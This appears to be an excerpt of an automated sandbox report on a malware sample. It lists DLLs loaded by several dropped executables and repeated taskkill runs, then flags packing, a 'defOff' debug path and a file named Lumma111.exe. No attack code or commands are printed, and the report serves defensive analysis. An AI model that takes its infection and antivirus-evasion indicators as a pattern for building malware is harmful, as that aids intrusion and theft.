Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1858048 > 1048576
Source: file.exe Static PE information: Raw size of hwqxmwlo is bigger than: 0x100000 < 0x193c00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: c8a61f4196.exe, 00000021.00000003.2901113043.00000000050E0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Unpacked PE file: 9.2.Lumma111.exe.380000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ucbvvkym:EW;dvaxjyps:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ucbvvkym:EW;dvaxjyps:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Unpacked PE file: 10.2.cfc45d1c7c.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;akxghhwi:EW;yjeyyxpl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;akxghhwi:EW;yjeyyxpl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Unpacked PE file: 11.2.686764db73.exe.150000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lgjpmlrc:EW;fjrpqkrp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lgjpmlrc:EW;fjrpqkrp:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Unpacked PE file: 12.2.cfc45d1c7c.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;akxghhwi:EW;yjeyyxpl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;akxghhwi:EW;yjeyyxpl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Unpacked PE file: 30.2.686764db73.exe.150000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lgjpmlrc:EW;fjrpqkrp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lgjpmlrc:EW;fjrpqkrp:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: Lumma111.exe.6.dr Static PE information: real checksum: 0x1cfc23 should be: 0x1d7d2c
